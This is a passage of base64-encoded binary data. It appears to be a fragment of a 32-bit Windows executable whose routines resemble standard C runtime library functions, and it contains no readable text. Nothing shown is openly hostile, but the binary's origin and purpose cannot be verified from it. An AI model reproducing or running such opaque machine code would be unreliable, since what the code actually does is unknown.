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NOibyFMP7///+FLP7//+tlM8BQiYWc9v//iYUs/v//jYWg9v//UI2FMP7//1NQ6EtS//+DxBAywOk3////g6Wc9v//AIOlLP7//wBqAOsPM8BQiYUs/v//iYWc9v//jYWg9v//UI2FMP7//1NQ6AxS//+DxBCLvYT4//+L94uNLP7//4m1tPj//4XJdHcz9jP/i4S9MP7//2oKWvfiA8aJhL0w/v//g9IAR4vyO/l14Ym1nPj//4X2i7W0+P//dEKLjSz+//+D+XNzEYvCiYSNMP7///+FLP7//+smM8BQiYWc9v//iYUs/v//jYWg9v//UI2FMP7//1NQ6H9R//+DxBCL/o2FXPz//1CNhSz+//9Q6OA0//9ZWWoKWjvCD4WRAAAA/4WU+P//jXcBi4Vc/P//xgcxibW0+P//hcAPhIsAAAAz/4vwM8mLhI1g/P//9+JqCgPHiYSNYPz//4PSAEGL+lo7znXhi7W0+P//hf90XIuFXPz//4P4c3MPibyFYPz///+FXPz//+tCM8BQiYWc9v//iYVc/P//jYWg9v//UI2FYPz//1NQ6M5Q//+DxBDrGoXAdQmLhZT4//9I6xMEMI13AYgHibW0+P//i4WU+P//i42A+P//iUEEi42I+P//hcB4CoH5////f3cCA8iLRRxIO8FyAovBA4WE+P//iYWI+P//O/APhNMAAACLhSz+//+FwA+ExQAAADP/i/AzyYuEjTD+//+6AMqaO/fiA8eJhI0w/v//g9IAQYv6O85134u1tPj//4X/dECLhSz+//+D+HNzD4m8hTD+////hSz+///rJjPAUImFnPb//4mFLP7//42FoPb//1CNhTD+//9TUOjyT///g8QQjYVc/P//UI2FLP7//1DoVTP//1lZi42I+P//aghfK84z0ve1jPj//4DCMDvPcgOIFDdPg///deiD+Ql2A2oJWQPxibW0+P//O7WI+P//D4Ut////xgYA6ypohHIHEOsTaHxyBxDrDGh0cgcQ6wVobHIHEP91HFPoMHz//4PEDIXAdSeAvXT4//8AX15bdA2NhWz4//9Q6DwpAABZi038M83o54v+/4vlXcMzwFBQUFBQ6PR+///Mi/9Vi+xX/3UM6L3X/v9Zi00Mi/iLSQz2wQZ1H+j5gf//xwAJAAAAi0UMahBZg8AM8AkIg8j/6dMAAACLRQ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oQhcB0DSvCiX34a8A8iUX06waJXfiJXfTox8f//4v4jUXwUFNqP/82av9opJcKEFNX/xVgQwcQhcB0DDld8HUHiwaIWD/rBIsGiBiNRfBQU2o//3YEav9o+JcKEFNX/xVgQwcQX4XAdA05XfB1CItGBIhYP+sFi0YEiBiLdfzoZ/z//4kwi3X46FH8//+JMIt19OhN/P//iTBeW4vlXcNTU1NTU+hoXv//zIv/VYvsgewMAQAAoRhgChAzxYlF/IMNDGgKEP+Nhfz+//+DDQBoChD/U1ZXu/iSBxAz/1NoAAEAAFCNhfj+//+JPZiXChBQ6JUXAACDxBCFwHUIjb38/v//60aD+CJ1Qf+1+P7//+iwWv//i/BZhfZ1CFfoaVr//+smU/+1+P7//42F9P7//1ZQ6FMXAACDxBCFwHQDVuvbV+hDWv//i/5ZjYX8/v//i/cr8PfeG/Yj94X/dA6APwB0CVfoEPz//1nrBejd/f//VugTWv//WYtN/F9eM81b6G5q/v+L5V3DaghocDgKEOhZaP7/oUyYChCFwHUtagboWoL//1mDZfwAoUyYChCFwHUM6PH+///w/wVMmAoQx0X8/v///+gGAAAA6GRo/v/Dagbob4L//1nDzMzMzIv/VYvsUaEYYAoQM8WJRfyLTQhTi10MO9l2bItFEFZXjRQBi/KL+TvzdyjrA41JAItNFFdW/xVYRgcQ/1UUg8QIhcB+Aov+i0UQA/A783bgi00Ii/CL0zv7dCGFwHQdK/uKAo1SAYpMF/+IRBf/iEr/g+4BdeuLRRCLTQgr2I0UATvZd55fXotN/DPNW+iDaf7/i+Vdw8zMzMzMzMzMzMyL/1WL7ItFDFeLfQg7+HQmVot1EIX2dB0r+I2bAAAAAIoIjUABilQH/4hMB/+IUP+D7gF1615fXcPMzMzMzMzMi/9Vi+yB7BwBAAChGGAKEDPFiUX8i00Ii1UMiY38/v//Vot1FIm1AP///1eLfRCJvQT///+FyXUkhdJ0IOg3X///xwAWAAAA6PVb//9fXotN/DPN6Nxo/v+L5V3Dhf903IX2dNjHhfj+//8AAAAAg/oCD4ISAwAASg+v11MD0YmVCP///4vCM9Irwff3jVgBg/sIdxZWV/+1CP///1Hoff7//4PEEOm3AgAA0esPr98D2VNRi86JnfD+////FVhGBxD/1oPECIXAfhBXU/+1/P7//+jo/v//g8QM/7UI////i87/tfz+////FVhGBxD/1oPECIXAfhVX/7UI/////7X8/v//6Lb+//+DxAz/tQj///+LzlP/FVhGBxD/1oPECIXAfhBX/7UI////U+iO/v//g8QMi4UI////i/iLtfz+//+LlQT///+Jhez+//+QO952NwPyibX0/v//O/NzJYuNAP///1NW/xVYRgcQ/5UA////i5UE////g8QIhcB+0zvedz2LhQj///+LvQD///8D8jvwdx9TVovP/xVYRgcQ/9eLlQT///+DxAiFwIuFCP///37bi73s/v//ibX0/v//i7UA////6waNmwAAAACLlQT///8r+jv7dhlTV4vO/xVYRgcQ/9aDxAiFwH/hi5UE////i7X0/v//ib3s/v//O/5yXomV6P7//4m95P7//zv3dDOL3ovXi7Xo/v//K9+KAo1SAYpME/+IRBP/iEr/g+4BdeuLtfT+//+LnfD+//+LlQT///+LhQj///873w+F+v7//4veiZ3w/v//6e3+//8D+jvfczKNpCQAAAAAK